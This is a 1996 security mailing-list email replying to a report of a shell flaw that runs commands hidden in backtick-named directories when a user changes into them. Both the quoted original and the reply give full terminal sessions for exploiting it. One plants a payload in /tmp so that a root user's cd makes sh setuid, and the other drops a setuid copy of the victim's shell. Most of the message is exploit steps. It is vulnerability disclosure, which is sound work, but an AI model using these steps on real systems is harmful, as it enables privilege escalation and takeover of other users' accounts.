From hartwick@primeline.net Sat Sep 14 13:51:02 1996 Received: from pdx1.world.net (pdx1.world.net [192.243.32.18]) by suburbia.net (8.7.4/Proff-950810) with ESMTP id NAA07725 for ; Sat, 14 Sep 1996 13:50:38 +1000 Received: from primeline.net (root@ns.primeline.net [207.81.5.2]) by pdx1.world.net (8.7.5/8.7.3) with ESMTP id UAA03563 for ; Fri, 13 Sep 1996 20:06:53 -0700 (PDT) Received: from primeline.net (hartwick@primeline.primeline.net [207.81.5.2]) by primeline.net (8.7.5/8.6.9) with SMTP id WAA23762; Fri, 13 Sep 1996 22:53:12 -0400 Date: Fri, 13 Sep 1996 22:53:11 -0400 (EDT) From: "Michael J. Hartwick" To: test cc: Multiple recipients of list BUGTRAQ , best-of-security@suburbia.net Subject: Re: BoS: tee see shell problems In-Reply-To: Message-ID: MIME-Version: 1.0 Content-Type: TEXT/PLAIN; charset=US-ASCII I just tested a variation of this exploit with bash 1.14.6(1) running on Linux 2.0.13. By using my variation I managed to become root. I find this frightening. In my variation I wasn't as subtle. To use a large portion of the original exploit. Hopefully things like this won't happen, but it is possible. I know that I will forever be much more careful when cd'ing from now on. This is a very simplistic example, but I am sure more difficult ones can be devised. ----------------------------Cut to Bad guy-------------------------------- jim% whoami Evol bad guy jim% mkdir /tmp/\`source\ .WaReZ\` jim% cd /tmp/\`source\ .WaReZ\` jim% echo chmod 4755 `which sh` 2\&\> /dev/null > .WaReZ jim% chmod +x .WaReZ jim% cd ---------------------------Cut to unsuspecting foo------------------------ jim# whoami root jim# echo $SHELL /bin/bash jim# I just like to check that sometimes. jim# Hey, I'm bored maybe I'll check /tmp for some neato stuff jim# cd /tmp jim# ls `source .WaReZ` jim# OH BOY!!! the jack pot! jim# cd *WaReZ* jim# ls jim# oh, oh well maybe I'll check later... jim# cd ----------------------------Cut to More Bad guy-------------------------- jim% bash #whoami root # hah. ---------------------------End Unix Parable------------------------------- On Fri, 13 Sep 1996, test wrote: >A vulnerability exists in tcsh (tcsh 6.05, or the one that's being handed >out with BSDI anyway.) that allows the execution of arbitrary commands >when changing into directories that are enclosed with back tic's. The >problem might also prove to be quite bad to tcsh scripts that find >themselves changing into directories on the fly. > >Here is probably one of the dumbest methods possible that could be used to >exploit this weakness. > >----------------------------Cut to Bad guy-------------------------------- > >jim% whoami >Evol bad guy >jim% mkdir /tmp/\`source\ .WaReZ\` >jim% echo echo #\\\!/bin/sh \> .\$\$ > /tmp/*W*/.WaReZ >jim% echo echo sh \> .\$\$ >> /tmp/*W*/.WaReZ >jim% echo chmod 4755 .\$\$ >> /tmp/*W*/.WaReZ >jim% chmod +x /tmp/*W*/.WaReZ > >---------------------------Cut to unsuspecting foo------------------------ > >jim% whoami >Unsuspecting foo >jim% echo $SHELL >/bin/tcsh >jim% I just like to check that sometimes. >jim% Hey, I'm bored maybe I'll check /tmp for some neato stuff >jim% cd /tmp >jim% ls > >`source .WaReZ` > >jim% OH BOY!!! the jack pot! >jim% cd *WaReZ* >jim% ls > >jim% oh, oh well maybe I'll check later... >jim% cd $HOME > >----------------------------Cut to More Bad guy-------------------------- > >jim% ls -a /tmp/*W*/ > >. >.. >.24753 > >jim% /tmp/*W*/.24753 >$whoami >unsuspecting foo >$ hah. >---------------------------End Unix Parable------------------------------- > ---------------------------------------------------------------------------- Michael J. Hartwick, VE3SLQ Hartwick Communications Consulting hartwick@primeline.net